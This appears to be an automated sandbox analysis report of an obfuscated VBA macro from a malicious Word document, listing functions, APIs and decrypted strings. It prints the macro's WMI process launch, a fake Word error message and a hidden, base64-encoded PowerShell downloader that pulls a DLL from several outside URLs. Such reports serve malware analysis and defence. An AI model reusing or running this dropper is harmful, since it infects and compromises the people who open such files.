19	Dim DKUOJzi as Range
19	Set DKUOJzi = Array((zHRlEdEP), Target)	Array zHRlEdEP Target
20	If DKUOJzi Is Nothing Then
21	Endif
22	Dim DGpFCB() as String
22	DGpFCB = Split(rSrZBJJv, uldHRAc)	Split rSrZBJJv uldHRAc
22	elqXMZ:
24	mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
25	Rjwqx5pa0bii0zjv0 = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
26	Goto prhgQCFm
27	Const bpMND as String = "A"
28	Const ixJTYF as String = ","
29	Const nvNjhAFA as String = "high,critic"
30	Dim vDIdCwGfT as Range
30	Set vDIdCwGfT = Array((bpMND), Target)	Array bpMND Target
31	If vDIdCwGfT Is Nothing Then
32	Endif
33	Dim PASRFGECE() as String
33	PASRFGECE = Split(nvNjhAFA, ixJTYF)	Split nvNjhAFA ixJTYF
33	prhgQCFm:
35	Wti36fxa67_iliapeg = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
36	Goto vEmIAMH
37	Const eGHABDHYI as String = "A"
38	Const wJdJAI as String = ","
39	Const DSEaFYQ as String = "high,critic"
40	Dim PdrYYCtJ as Range
40	Set PdrYYCtJ = Array((eGHABDHYI), Target)	Array eGHABDHYI Target
41	If PdrYYCtJ Is Nothing Then
42	Endif
43	Dim DunxEHX() as String
43	DunxEHX = Split(DSEaFYQ, wJdJAI)	Split DSEaFYQ wJdJAI
43	vEmIAMH:
45	Qcpt8n14rllbi98 = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
46	Goto ffeODEi
47	Const eBzEFGPxh as String = "A"
48	Const UsjaB as String = ","
49	Const sujuoHFCJ as String = "high,critic"
50	Dim kRgnIQJCn as Range
50	Set kRgnIQJCn = Array((eBzEFGPxh), Target)	Array eBzEFGPxh Target
51	If kRgnIQJCn Is Nothing Then
52	Endif
53	Dim uZukAmEA() as String
53	uZukAmEA = Split(sujuoHFCJ, UsjaB)	Split sujuoHFCJ UsjaB
53	ffeODEi:
55	Sq3vjdsxcq9piizr = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"	Mid Name Application
56	Goto zYRcUHEHG
57	Const xfQswJFE as String = "A"
58	Const lhhIDAA as String = ","
59	Const fEDGCAg as String = "high,critic"
60	Dim xjjUNmJ as Range
60	Set xjjUNmJ = Array((xfQswJFE), Target)	Array xfQswJFE Target
61	If xjjUNmJ Is Nothing Then
62	Endif
63	Dim VZWOFv() as String
63	VZWOFv = Split(fEDGCAg, lhhIDAA)	Split fEDGCAg lhhIDAA
63	zYRcUHEHG:
65	B8ot8fduc6wr = Qcpt8n14rllbi98 + Sq3vjdsxcq9piizr + Wti36fxa67_iliapeg + mjbBYHhbs + Rjwqx5pa0bii0zjv0
66	Goto QFAdJG
67	Const yNpnD as String = "A"
68	Const ifTgDoG as String = ","
69	Const JjJbB as String = "high,critic"
70	Dim tuLCMCI as Range
70	Set tuLCMCI = Array((yNpnD), Target)	Array yNpnD Target
71	If tuLCMCI Is Nothing Then
72	Endif
73	Dim aACrBzCHd() as String
73	aACrBzCHd = Split(JjJbB, ifTgDoG)	Split JjJbB ifTgDoG
73	QFAdJG:
75	J8zona45gf3qr0 = K2eqcmojfn8ix90d6(B8ot8fduc6wr)
76	Goto AQJEzpnoG
77	Const qtNpWFzCE as String = "A"
78	Const JaknVR as String = ","
79	Const riWqFGJY as String = "high,critic"
80	Dim lHXavB as Range
80	Set lHXavB = Array((qtNpWFzCE), Target)	Array qtNpWFzCE Target
81	If lHXavB Is Nothing Then
82	Endif
83	Dim IOPMfG() as String
83	IOPMfG = Split(riWqFGJY, JaknVR)	Split riWqFGJY JaknVR
83	AQJEzpnoG:
85	Set Jdm74rzs4y2p2zfm_u = VBA.GetObject(J8zona45gf3qr0)	GetObject("winmgmts:win32_process") executed
86	Goto YtjFBe
87	Const KAAmsFJLa as String = "A"
88	Const NFoIZAgdj as String = ","
89	Const sOfSqNO as String = "high,critic"
90	Dim espWEuWIh as Range
90	Set espWEuWIh = Array((KAAmsFJLa), Target)	Array KAAmsFJLa Target
91	If espWEuWIh Is Nothing Then
92	Endif
93	Dim ZDKqIFEBG() as String
93	ZDKqIFEBG = Split(sOfSqNO, NFoIZAgdj)	Split sOfSqNO NFoIZAgdj
93	YtjFBe:
95	mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))	Mid Len(" ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd Uwns wu db ndBFns wu db ndAFns wu db ndQAns wu db ndIAns wu db ndAgns wu db ndACns wu db ndgAns wu db ndIgns wu db ndA1ns wu db ndACns wu db ndIAns wu db ndKwns wu db ndAins wu db ndAEns wu db ndYAns wu db ndVAns wu db ndBzns wu db ndAEns wu db ndcAns wu db ndIgns wu db ndApns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndAFns wu db ndsAns wu db nddAns wu db ndBZns wu db ndAFns wu db ndAAns wu db ndRQns wu db ndBdns wu db ndACns wu db ndgAns wu db ndIgns wu db ndB7ns wu db ndADns wu db ndEAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndMAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndAAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndQAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndIAns wu db ndfQns wu db ndAins wu db ndACns wu db ndAAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBJns wu db ndAGns wu db nd8Ans wu db ndLgns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndBzns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndTwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndcwns wu db ndB0ns wu db ndAGns wu db ndUAns wu db ndbQns wu db ndAuns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndQAns wu db ndSQns wu db ndByns wu db ndAGns wu db ndUAns wu db ndYwns wu db ndB0ns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndOwns wu db ndAgns wu db ndACns wu db ndAAns wu db ndJAns wu db ndBxns wu db ndAEns wu db ndUAns wu db ndMwns wu db ndBSns wu db ndADns wu db ndkAns wu db ndPQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAHns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBmns wu db ndACns wu db ndcAns wu db ndWQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndBTns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAFns wu db ndAAns wu db ndbwns wu db ndBpns wu db ndAEns wu db nd4Ans wu db nddAns wu d) -> 37668 executed
96	pqwm = K2eqcmojfn8ix90d6(mxkikw)
97	Goto LnRqcjdHC
98	Const muQUuJD as String = "A"
99	Const xBaZq as String = ","
100	Const urqwC as String = "high,critic"
101	Dim rykKLTfBV as Range
101	Set rykKLTfBV = Array((muQUuJD), Target)	Array muQUuJD Target
102	If rykKLTfBV Is Nothing Then
103	Endif
104	Dim xnvME() as String
104	xnvME = Split(urqwC, xBaZq)	Split urqwC xBaZq
104	LnRqcjdHC:
106	Jdm74rzs4y2p2zfm_u.Create pqwm, Alvw54nlrq0k5fkzbc, Y10e4jw1j3djjv0vy_	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwA,,) -> 0 Alvw54nlrq0k5fkzbc Y10e4jw1j3djjv0vy_ executed
107	Goto HsRXzxA
108	Const IKEyYJ as String = "A"
109	Const dBZlAG as String = ","
110	Const HYqcb as String = "high,critic"
111	Dim nEsTCdYDH as Range
111	Set nEsTCdYDH = Array((IKEyYJ), Target)	Array IKEyYJ Target
112	If nEsTCdYDH Is Nothing Then
113	Endif
114	Dim PEoELvIQJ() as String
114	PEoELvIQJ = Split(HYqcb, dBZlAG)	Split HYqcb dBZlAG
114	HsRXzxA:
116	End Function

Function K2eqcmojfn8ix90d6, APIs: 62, Strings: 12, Number of lines: 50, Relevance: 111.05

APIs	Meta Information
Array
jyxYAFLC
Target
Split
XpIXCDhMq
BJMbZuJRF
Array
jzCVAIVG
Target
Split
WPKmFe
pNdoqWCxt
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Array
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: WzIrJQJ
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Target
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Split
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: TjMQdBBgE
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: NYPQCHF
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Array
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: DObDSSSH
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Target
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Split
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: PmuwJBJH
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: PCtZE
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Array
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: dFuMF
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Target
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Split
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: ctRAim
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: IkIlHED
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Replace
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Zqvivtw592lxn
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Array
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: huVBjtENv
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Target
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Split
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: sHhQm
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: hxzoFBtLC
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Array
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: SbmMCGuEY
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Target
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Split
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: NvjyW
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: OwqxzJE
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Array
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: dvuZzGDnA
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Target
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: Split
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: VcboAE
Part of subcall function Qbtcycloqlj79qjl@Gusca95luq_: ZJSnRBDm
Array
SzdUE
Target
Split
fsCkG
SVfwH
Array
cyDODgZgJ
Target
Split
cpeHA
yPcgGA

Strings	Decrypted Strings
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"

Line	Instruction	Meta Information
117	Function K2eqcmojfn8ix90d6(R3q4in34ym5v2il)
118	On Error Resume Next	executed
119	Goto VHxfT
120	Const jyxYAFLC as String = "A"
121	Const BJMbZuJRF as String = ","
122	Const XpIXCDhMq as String = "high,critic"
123	Dim LXXQDDfJ as Range
123	Set LXXQDDfJ = Array((jyxYAFLC), Target)	Array jyxYAFLC Target
124	If LXXQDDfJ Is Nothing Then
125	Endif
126	Dim kXidGGmrk() as String
126	kXidGGmrk = Split(XpIXCDhMq, BJMbZuJRF)	Split XpIXCDhMq BJMbZuJRF
126	VHxfT:
128	Iuykcdayu0ux2dsn = R3q4in34ym5v2il
129	Goto UTlaBhGD
130	Const jzCVAIVG as String = "A"
131	Const pNdoqWCxt as String = ","
132	Const WPKmFe as String = "high,critic"
133	Dim clPKFBjz as Range
133	Set clPKFBjz = Array((jzCVAIVG), Target)	Array jzCVAIVG Target
134	If clPKFBjz Is Nothing Then
135	Endif
136	Dim otHyDQA() as String
136	otHyDQA = Split(WPKmFe, pNdoqWCxt)	Split WPKmFe pNdoqWCxt
136	UTlaBhGD:
138	Pk_5b3ebff5osp = Qbtcycloqlj79qjl(Iuykcdayu0ux2dsn)
139	Goto AQOwDFGF
140	Const SzdUE as String = "A"
141	Const SVfwH as String = ","
142	Const fsCkG as String = "high,critic"
143	Dim FGWgu as Range
143	Set FGWgu = Array((SzdUE), Target)	Array SzdUE Target
144	If FGWgu Is Nothing Then
145	Endif
146	Dim cHCfACCC() as String
146	cHCfACCC = Split(fsCkG, SVfwH)	Split fsCkG SVfwH
146	AQOwDFGF:
148	K2eqcmojfn8ix90d6 = Pk_5b3ebff5osp
149	Goto ortGB
150	Const cyDODgZgJ as String = "A"
151	Const yPcgGA as String = ","
152	Const cpeHA as String = "high,critic"
153	Dim oAcbS as Range
153	Set oAcbS = Array((cyDODgZgJ), Target)	Array cyDODgZgJ Target
154	If oAcbS Is Nothing Then
155	Endif
156	Dim RcxFVMDOH() as String
156	RcxFVMDOH = Split(cpeHA, yPcgGA)	Split cpeHA yPcgGA
156	ortGB:
158	End Function

Function Qbtcycloqlj79qjl, APIs: 38, Strings: 19, Number of lines: 69, Relevance: 105.069

APIs	Meta Information
Array
WzIrJQJ
Target
Split
TjMQdBBgE
NYPQCHF
Array
DObDSSSH
Target
Split
PmuwJBJH
PCtZE
Array
dFuMF
Target
Split
ctRAim
IkIlHED
Replace	Replace("wns wu db ndinns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db ndns wu db ndns wu db ndsns wu db ndns wu db ndns wu db nd:wns wu db ndns wu db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db ndns wu db ndpns wu db ndns wu db ndrons wu db ndns wu db ndcens wu db ndsns wu db ndsns wu db ndns wu db nd","ns wu db nd",) -> winmgmts:win32_process Replace("ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd Uwns wu db ndBFns wu db ndAFns wu db ndQAns wu db ndIAns wu db ndAgns wu db ndACns wu db ndgAns wu db ndIgns wu db ndA1ns wu db ndACns wu db ndIAns wu db ndKwns wu db ndAins wu db ndAEns wu db ndYAns wu db ndVAns wu db ndBzns wu db ndAEns wu db ndcAns wu db ndIgns wu db ndApns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndAFns wu db ndsAns wu db nddAns wu db ndBZns wu db ndAFns wu db ndAAns wu db ndRQns wu db ndBdns wu db ndACns wu db ndgAns wu db ndIgns wu db ndB7ns wu db ndADns wu db ndEAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndMAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndAAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndQAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndIAns wu db ndfQns wu db ndAins wu db ndACns wu db ndAAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBJns wu db ndAGns wu db nd8Ans wu db ndLgns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndBzns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndTwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndcwns wu db ndB0ns wu db ndAGns wu db ndUAns wu db ndbQns wu db ndAuns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndQAns wu db ndSQns wu db ndByns wu db ndAGns wu db ndUAns wu db ndYwns wu db ndB0ns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndOwns wu db ndAgns wu db ndACns wu db ndAAns wu db ndJAns wu db ndBxns wu db ndAEns wu db ndUAns wu db ndMwns wu db ndBSns wu db ndADns wu db ndkAns wu db ndPQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAHns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBmns wu db ndACns wu db ndcAns wu db ndWQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndBTns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAFns wu db ndAAns wu db ndbwns wu db ndBpns wu db ndAEns wu db nd4Ans wu db nddAns wu db n,"ns wu db nd",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 